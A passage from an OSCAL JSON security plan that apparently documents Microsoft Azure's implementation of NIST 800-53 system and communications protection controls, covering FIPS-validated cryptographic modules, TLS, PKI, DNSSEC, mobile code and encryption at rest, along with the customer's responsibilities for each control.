Module * 2988 - Citrix FIPS Cryptographic Module * 4019 - Arista EOS Crypto Module * 1521 - Cisco 2951, Cisco 3925 and Cisco 3945 Integrated Services Routers (ISRs) * 2409 - Cisco ASR 1001, 1001-X, 1002, 1002-X, 1004, 1006 and 1013 * 2090 - Cisco ASR 1001, ASR 1002, ASR1002-X, ASR 1004, ASR 1006 and ASR 1013 * 3775 - Cisco ASR 1000 Series Routers with MACSEC * 3988 - Cisco ASR 1000 Series Routers without MACSEC * 3841 - F5® Device Cryptographic Module * 2896 - Pulse Secure Cryptographic Module 
* 3416 - Juniper Networks MX240, MX480, MX960, MX2010, MX2020 3D Universal Edge Routers and EX9204, EX9208, EX9214 Ethernet Switches with RE1800 Routing Engine * 3934 - Juniper Networks MX240, MX480, MX960 3D Universal Edge Routers with RE1800 Routing Engine and Multiservices MPC * 3935 - Juniper Networks MX240, MX480, MX960 3D Universal Edge Routers with RE1800 Routing Engine and MPC7E-10G MACsec Card * 2388 - IOS Common Cryptographic Module (IC2M) Rel5 AES-256 bit encrypted SSH is used for network device authentication using Federal Information Processing Standards (FIPS) 140-2 approved algorithms: * 0048 - SecureCRT VanDyke 8.0.3 (FIPS Validation Certificate 0048) * 2643 - nShield F2 500+, nShield F2 1500+ and nShield F2 6000+ Azure Key Stores The Thales nShield Hardware Security Modules used by KeyVault employ cryptographic modules certified by NIST as being Federal Information Processing Standards (FIPS) 140-2 compliant; relevant NIST certificate number is 2643. Azure Managed HSM and KeyVault utilize CMVP certificate number 4399 from Marvell vendor. Azure Dedicated HSM utilizes CMVP certificate numbers 4090 and 4684 certificate numbers from Thales vendor. Azure has an alternative implementation for the security control. Azure baseline configurations tracked via AzSecPack are designed to implement and monitor appropriate ciphers used for authentication. Moreover, Azure implements Federal Information Processing Standards (FIPS) 140-2-approved algorithms in CMVP-validated cryptographic modules but is currently unable to run all servers in FIPS mode. Where possible, Azure implements FIPS mode on servers. However, FIPS mode has operational impacts on key Azure services for non-security cryptographic implementations. In addition, some cipher suites which are considered weak are used to accommodate Azure customers. Lastly, Microsoft continues to drive TLS 1.2 and 1.3 only within Azure. 
Elimination of TLS 1.0 and 1.1 is an Enterprise Promise, ensuring visibility at the highest levels of Azure. Asset misconfigurations do occur, but they are monitored and tracked via AzSecPack baseline settings. If an asset allows TLS 1.0 or 1.1, the owning service team is alerted via monitoring tools. Azure uses multiple reporting engines to ensure all TLS below 1.2 and 1.3 is identified and appropriate action is taken. It is important to note that some externally facing services must support older TLS versions for customer purposes."}],"responsibilities":[{"uuid":"201ecf13-028f-4d87-91c9-20520311c848","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-038"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for implementing customer-defined cryptography within customer-deployed resources in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, and standards. Government customers will ensure that personal computing devices (client systems) are configured to request FIPS 140-2 encryption ciphers and protocols for all network sessions. 
Commercial customers may also choose to use FIPS 140-2 ciphers and protocols when connecting to Azure Public.","provided-uuid":"85eaccaa-72bc-4d9f-bbd4-6b36fba345cd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2e611f9c-3114-4632-b062-aabaf0561508","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-15","statements":[{"uuid":"75673ee2-aa06-40dc-8cbb-a6b628443d03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-039"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sc-15_smt.a","by-components":[{"uuid":"43b2878f-bdc0-4f4c-833b-37facea53121","export":{"provided":[{"uuid":"5633f161-80cc-463e-80df-5fa3660cd63c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-039"}],"description":"Azure does not allow collaborative computing devices and there are no instances of collaborative computing devices within the Azure accreditation boundary managed by Azure. 
This includes Hyper-V clipboard functions, microphones, network white boards, and cameras."}],"responsibilities":[{"uuid":"68001c48-2815-4e8e-a008-43e7ae656889","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-039"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for prohibiting remote activation of any collaborative computing devices within or controlled from customer-deployed resources and defining exceptions where remote activation is allowed (if any).","provided-uuid":"5633f161-80cc-463e-80df-5fa3660cd63c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"eedd51b9-b852-46ba-a7d8-ef4f00760815","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-040"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sc-15_smt.b","by-components":[{"uuid":"ca0a7d71-c2eb-4c41-a42e-5d57b5e5bacc","export":{"provided":[{"uuid":"624d5a5a-8841-4985-856c-6267e7402617","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-040"}],"description":"Azure does not allow collaborative computing devices and there are no instances of collaborative computing devices within the Azure accreditation boundary managed by Azure. 
This includes Hyper-V clipboard functions, microphones, network white boards, and cameras."}],"responsibilities":[{"uuid":"ebded381-5192-4bb4-bc5c-82f9b68b45cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-040"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for providing a notification when physically presenting at a collaborative device.","provided-uuid":"624d5a5a-8841-4985-856c-6267e7402617"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"63229042-229b-4871-a910-d2523b3e47a4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-17","statements":[{"uuid":"63465b4b-0295-4db8-84c1-1f95917e59ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-17_smt.a","by-components":[{"uuid":"d24ab942-b25d-444e-a83d-717cc1fccbc3","export":{"provided":[{"uuid":"74f2e9bd-282d-4db9-b5ed-cfa46ba0b045","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-041"}],"description":"The Key Management Standard applies to the operation of all Microsoft's online services residing within the Azure environment utilizing cryptographic mechanisms for securing data or services. This standard applies to all environments managed by Azure, including labs, production, and preproduction. 
Microsoft's corporate Public Key Infrastructure (PKI) has been established to provide a variety of digital certificate services to support operations for Azure and for the Microsoft Corporation. Microsoft corporate PKI functions as the Certificate Authority (CA) and Registration Authority (RA) and provides directory services to manage keys and certificates. Internal Azure traffic does not require the use of digital certificates and also includes the use of self-signed certificates. The use of self-signed certificates applies exclusively to internal use within Azure."}],"responsibilities":[{"uuid":"94240893-2ebc-4f07-8f23-4d4c9f04cbef","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-041"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for defining and enforcing a policy for issuing public key certificates or obtaining public key certificates from an approved service provider. Government customers are responsible for having a process in place to check the validity of the Azure websites prior to signing on by reviewing the digital certificate on the site to ensure they are the Azure websites. 
If government customers are using USGCB baselines, supported web browsers will enforce this review automatically by default and prevent connections if the digital certificate is invalid.","provided-uuid":"74f2e9bd-282d-4db9-b5ed-cfa46ba0b045"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"abc311da-cb82-4955-a7f2-417bf1d2e2ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-042"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-17_smt.b","by-components":[{"uuid":"3a265edd-ac91-4fd8-b336-43527e7f858d","export":{"provided":[{"uuid":"8bc2bdff-e6ed-47f9-914a-b17d84927c93","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-042"}],"description":"The Key Management Standard applies to the operation of all Microsoft's online services residing within the Azure environment utilizing cryptographic mechanisms for securing data or services. This standard applies to all environments managed by Azure, including labs, production, and preproduction. Microsoft's corporate Public Key Infrastructure (PKI) has been established to provide a variety of digital certificate services to support operations for Azure and for the Microsoft Corporation. Microsoft corporate PKI functions as the Certificate Authority (CA) and Registration Authority (RA) and provides directory services to manage keys and certificates. Internal Azure traffic does not require the use of digital certificates and also includes the use of self-signed certificates. 
The use of self-signed certificates applies exclusively to internal use within Azure."}],"responsibilities":[{"uuid":"6ce41063-26c2-4413-a30d-f4d09b8869c4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-042"}],"description":"The customer is responsible to only include approved trust anchors in trust stores or certificate stores managed for customer-deployed resources.","provided-uuid":"8bc2bdff-e6ed-47f9-914a-b17d84927c93"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b4b2148f-fafe-40c2-9df9-791c88ad0480","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-18","statements":[{"uuid":"00c01d3c-fe18-4454-9dfe-1a0fb9bee228","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-043"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-18_smt.a","by-components":[{"uuid":"b991c3e4-ad86-4aa4-8fa2-8d2d1af660fd","export":{"provided":[{"uuid":"476c9de8-fe90-4d03-a8ae-656fcf915738","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-043"}],"description":"Microsoft's Security Development Lifecycle (SDL) process includes provisions for defining acceptable and unacceptable mobile code technologies. 
Unapproved mobile code is any mobile code that has not been developed and approved through the SDL."}],"responsibilities":[{"uuid":"5ddbc2f5-334c-444e-9eeb-f5692e9bf71d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-043"}],"description":"The customer is responsible for defining acceptable and unacceptable mobile code technologies.","provided-uuid":"476c9de8-fe90-4d03-a8ae-656fcf915738"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ac3e155d-0c75-41af-a144-349f489f5a33","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-044"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-18_smt.b","by-components":[{"uuid":"9a67b515-51a3-4640-bf4c-62e3dc9540db","export":{"provided":[{"uuid":"938332c6-039f-4b4f-97a7-aaebdb13c337","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-044"}],"description":"All approved mobile code in use in the environment is developed and reviewed following the SDL. 
All releases have release-specific implementation guidance and testing to ensure that only acceptable code is released."}],"responsibilities":[{"uuid":"d04a2854-48cf-4ff9-bc23-52216e16bb90","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-044"}],"description":"The customer is responsible for establishing usage restrictions and implementation guidance for acceptable mobile code and mobile code technologies.","provided-uuid":"938332c6-039f-4b4f-97a7-aaebdb13c337"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4068a03e-95dd-48d9-a194-ea7c5b86baae","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-20","statements":[{"uuid":"98dafeea-00c2-4004-b57c-354070fa4047","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-045"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-20_smt.a","by-components":[{"uuid":"cf00b190-22d5-4d6b-b6c8-ea4eff610933","export":{"provided":[{"uuid":"9f306b41-8fa0-4f01-81c1-5d21a5ba2bb1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-045"}],"description":"The Azure DNS infrastructure provides internal name resolution for internal Microsoft assets and external name resolution services to external customers, including Federal Agencies. However, Azure does not support DNSSEC and a customer is required to either bring their own DNS servers into Azure or use a third-party DNS provider if DNSSEC is a requirement. 
Azure uses three types of DNS servers. Azure DNS servers act as non-authoritative sources for DNS requests only from clients hosted inside Azure. A client makes a DNS query to a system DNS server; the system DNS server in turn queries an authoritative source outside the system. System DNS servers do not support the DNSSEC protocol. This control requires system DNS servers, when requested by clients, to perform origin/integrity verification of the response provided by authoritative sources. The control assumes that the client makes a DNS query of a system DNS server and that the DNS server must then query an authoritative source outside the system. The risk that the external authoritative source has been compromised is mitigated by the origin/integrity verification. Azure internal DNS servers resolve DNS queries from Azure servers. Azure servers do not request origin/integrity verification of the DNS query; instead, origin/integrity is assured via other means, such as a communications channel using TLS. Azure DNS production servers act as authoritative sources for DNS requests from external clients for various Azure domains and do not respond to any DNS queries against zones for which they are not the authority. Azure DNS servers perform two functions: 1. Resolving DNS queries from Azure servers. 2. 
Acting as authoritative sources for DNS requests from external clients for certain Microsoft.com subdomains. For case 1, queries are either for internal domains for which Azure DNS servers are authoritative, or for external domains used by Azure's services. In either case, Azure servers do not request origin/integrity verification of the DNS query. For case 2, this case is not possible for Azure DNS servers."}],"responsibilities":[{"uuid":"a104c27b-d152-423e-bc6f-07df0822654f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-045"}],"description":"The customer is responsible for a secure name and address resolution service, including providing data origin authentication and integrity verification, as well as authoritative name resolution data, in response to name and address resolution queries. Note: this control is only applicable to the customer if hosting DNS and resolving .gov domains.","provided-uuid":"9f306b41-8fa0-4f01-81c1-5d21a5ba2bb1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"929ef5c7-0ab8-4026-aeec-4dde518b5bcf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-046"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-20_smt.b","by-components":[{"uuid":"01440a28-7f88-4dfa-8e23-1c9572a85353","export":{"provided":[{"uuid":"d663070e-23eb-4ac0-87d9-08002e4c7bf7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-046"}],"description":"The Azure DNS infrastructure provides internal name resolution for internal Microsoft assets and external name resolution 
services to external customers, including Federal Agencies. However, Azure does not support DNSSEC and a customer is required to either bring their own DNS servers into Azure or use a third-party DNS provider if DNSSEC is a requirement. Azure DNS is a public service and anyone on the internet can access externally hosted zones. For internal Azure services that depend on DNS, Microsoft employs TLS to mitigate the need for DNSSEC. Azure customers who intend to secure their applications against DNS-based attacks can also use TLS to mitigate the need for DNSSEC. Microsoft implements compensating controls that mitigate the risk of not enacting DNSSEC according to IPSEC policy. HTTPS/TLS is required for all connections into the Azure environment, establishing secure connections with Azure resources. A customer connecting to an invalid server would still need to be presented with a valid certificate for a security breach to occur. Because the TLS/HTTPS implementation provides both authentication and encryption, Microsoft considers it sufficient for mitigating the risks of internal servers not being configured with DNSSEC. Outside of the effectiveness of TLS/HTTPS, customers can deploy their own VM-based DNS servers in their virtual networks. Customers can also choose to host DNS zones with third-party DNS hosting providers that support DNSSEC. Customers can also configure their own DNS servers to support DNSSEC validation/verification and use these servers to resolve DNS queries instead of the Azure-provided recursive resolver."}],"responsibilities":[{"uuid":"aac39be8-acbb-440d-bd50-60667f4c348a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-046"}],"description":"The customer is responsible for a secure name and address resolution service, including the ability to provide the security status of child zones, to verify chain of trust among parent and child domains. 
Note: this control is only applicable to the customer if hosting DNS and resolving .gov domains.","provided-uuid":"d663070e-23eb-4ac0-87d9-08002e4c7bf7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"09b0e98a-f637-41b5-96d4-4e4c092604fd","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-21","statements":[{"uuid":"e717475a-ac45-4438-b0ba-8c7eb38a0d94","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-047"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-21_smt","by-components":[{"uuid":"790ccc90-4666-43fe-be5d-e6cce1e9c020","export":{"provided":[{"uuid":"cc9e4a27-a92f-4caa-bd51-1c8f2fd9cb01","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-047"}],"description":"Azure DNS resolvers do not support DNSSEC and hence do not verify the integrity of a DNS response. Customers who require DNSSEC are required to bring their own DNS resolver servers. Microsoft implements compensating controls that mitigate the risk of not enacting DNSSEC according to IPSEC policy. HTTPS/TLS is required for all connections into the Azure environment, establishing secure connections with Azure resources. A customer connecting to an invalid server would still need to be presented with a valid certificate for a security breach to occur. 
Because the TLS/HTTPS implementation provides both authentication and encryption, Microsoft considers it sufficient for mitigating the risks of internal servers not being configured with DNSSEC. Outside of the effectiveness of TLS/HTTPS, customers can deploy their own VM-based DNS servers in the virtual networks. Customers can also choose to host DNS Zones with third-party DNS hosting providers that support DNSSEC. Customers can also configure their own DNS servers to support DNSSEC validation/verification and use these servers to resolve DNS queries instead of Azure provided recursive resolver._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f8178f08-9bde-4e19-8a3e-28239f713adf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-047"}],"description":"The customer is responsible for configuring customer-deployed resources to request and perform data origin authentication and data integrity verification on name/address resolution responses received from authoritative sources.","provided-uuid":"cc9e4a27-a92f-4caa-bd51-1c8f2fd9cb01"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"69e7edae-8a67-4bc7-b5eb-ed3deb0fba09","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-22","statements":[{"uuid":"4924c170-223a-4d2b-8aa3-41bfd0c334b0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-048"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-22_smt","by-components":[{"uuid":"4f369403-3482-45b4-b8f2-4fd11731650d","export":{"provided":[{"uuid":"4571f42d-1df2-43e5-b62c-0cb645fdbd75","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-048"}],"description":"The Azure DNS offering provides name and address resolution. Fault tolerance is built into the service through redundancy at multiple levels, including multiple DNS server clusters and multiple servers per cluster, and deployment at multiple Azure datacenter facilities which are geographically separated. Azure DNS also leverages network controls to restrict the types of hosts that can access an authoritative DNS server in a particular role.\n\nThe implementation incorporates a master repository of DNS zones. The master repository is deployed in multiple datacenters across different geographical regions for redundancy purposes. Data from the master repository is pulled into edge DNS servers on demand for resolving authoritative DNS queries. 
Data from the master repository is backed up and monitored with the security incident and event management tool as documented in the AU family of controls.\n\nAdditionally, a backup system built using a completely different hardware and software system stack is implemented and kept in sync with the master repository. This system is engaged in case of a catastrophic failure of the primary system.\n\nThe Azure DNS recursive resolver service has built-in cross-region failover capability that automatically switches the DNS traffic to another region in case there is a catastrophic failure of DNS resolution in one region."}],"responsibilities":[{"uuid":"6bcbec69-2039-4cd8-98a9-3f0b0ec7b5c4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-048"}],"description":"The customer is responsible for ensuring that the systems providing address resolution services for customer-deployed resources are fault-tolerant and implement internal/external role separation. 
Note: if customers configure their Domain Name Server (DNS) settings to use Microsoft Azure servers, Microsoft Azure DNS can support fault tolerance.","provided-uuid":"4571f42d-1df2-43e5-b62c-0cb645fdbd75"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"9a995a58-e813-4220-ad43-0c970928d0f6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-23","statements":[{"uuid":"04291b0b-e292-4d83-a512-93894f96b399","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-049"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-23_smt","by-components":[{"uuid":"e1d5baef-4746-4e7d-af2e-dc4f0e319eb9","export":{"provided":[{"uuid":"12ea3bea-449d-43fb-8426-c63b9a00015b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-049"}],"description":"Azure uses digital certificates to establish the identity of Jumpboxes, Debug servers, and Network Hop Boxes as the access points to the Azure environment. Digital certificates are used in public key infrastructure (PKI) to establish the identity of assets for purposes of authentication. This also supports encrypted connections using TLS, which is resistant to man-in-the-middle attacks.\n\nAll communications between Azure internal components that transfer confidential information are protected using TLS. 
In most cases, SSL certificates are self-signed, and their fingerprints are distributed over the same channels as the IP addresses. Exceptions are for any certificates for connections that could be accessed from outside the Azure network, including the storage service, and for the Fabric Controllers (FCs). FCs have certificates issued by a Microsoft Certificate Authority (CA) that chains back to a trusted root CA."}],"responsibilities":[{"uuid":"dc52a73b-2fe7-4c07-8c72-ff7df784193c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-049"}],"description":"The customer is responsible for protecting the authenticity of communications sessions involving customer-deployed resources. Government customers are responsible for having a process in place to check the validity of the Microsoft Azure websites prior to signing on by reviewing the digital certificate on the site to ensure they are the Microsoft Azure websites. If government customers are using USGCB baselines, supported web browsers will enforce this review automatically by default and prevent connections if the digital certificate is invalid.","provided-uuid":"12ea3bea-449d-43fb-8426-c63b9a00015b"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"21d16a49-d0d7-4a7b-a282-3b78b0e2137d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-24","statements":[{"uuid":"7cf9e0ae-c22b-455b-9001-c8ff9cba0495","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-050"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-24_smt","by-components":[{"uuid":"69d98218-bacf-49c7-a03e-1aeca044db20","export":{"provided":[{"uuid":"301da659-59d9-4bfd-92a0-8d0e68272791","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-050"}],"description":"To preserve data in the event of a system failure, Azure implements geographic redundancy and data mirroring. Azure employs geo-replication for Azure assets which can establish alternate storage sites geographically. Synchronization is the process of ensuring that files and directories already exist on the replica server and that they are identical to the original copies on the master server. Synchronization occurs before replication. Furthermore, Azure databases are data replicated through live mirroring. Boundary protection devices fail over to equally secure backup devices. 
In the event the process fails, the mechanisms fail to a known secure closed state, preserving confidentiality and integrity of all data within the system."}],"responsibilities":[{"uuid":"7da4b872-49ef-48cb-962c-8f1627650050","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-050"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for ensuring that customer-deployed resources fail in a known state for customer-defined types of failures to preserve the system state information in failure.","provided-uuid":"301da659-59d9-4bfd-92a0-8d0e68272791"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"dc1bad5c-1f67-4933-9cb7-d3302379afe4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-28.1","statements":[{"uuid":"910126d1-8e27-4448-827f-3411eb002cf6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-051"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-28_smt","by-components":[{"uuid":"7a31d402-ec15-429c-ad7e-88b9f449a980","export":{"provided":[{"uuid":"995c0a49-7737-4e34-a5fd-c9596fe4961d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-051"}],"description":"Azure protects information at rest by applying information-handling procedures. Assets must be protected per the standards appropriate for their defined asset class. 
Microsoft's Online Services has devised a set of minimum required protection standards for each asset class to appropriately protect the confidentiality, integrity, and availability of each asset. These minimum standards are defined in the Asset Classification and Asset Protection Standards. Data must be classified according to Corporate, External, and Legal Affairs (CELA) data classifications and associated retentions. Protections for information at rest are outlined in, but not limited to, the categories below:\n\n* Azure Storage automatically encrypts data when persisting it to the cloud. Data in Azure Storage is encrypted and decrypted transparently using 256-bit AES encryption, one of the strongest block ciphers available, and is FIPS 140-2 compliant. Azure Storage encryption is enabled for all new and existing storage accounts and cannot be disabled. Storage accounts are encrypted regardless of their performance tier (standard or premium) or deployment model (Azure Resource Manager or classic). All Azure Storage redundancy options support encryption, and all copies of a storage account are encrypted. All Azure Storage resources are encrypted, including blobs, disks, files, queues, and tables. All object metadata is also encrypted.\n* For each block written to Azure Storage accounts, a compressed and uncompressed CRC is used to identify corrupted data. Azure Storage checks the CRC after every major handoff of the data. In addition, a background job periodically runs on the extant assets checking the data checksum to find corrupted data.\n* Azure uses the Transport Layer Security (TLS) protocol to protect data traveling between Azure services and customers. Azure datacenters negotiate a TLS connection with client systems that connect to Azure services. Perfect Forward Secrecy (PFS) protects connections between customers' client systems and Azure services by unique keys. 
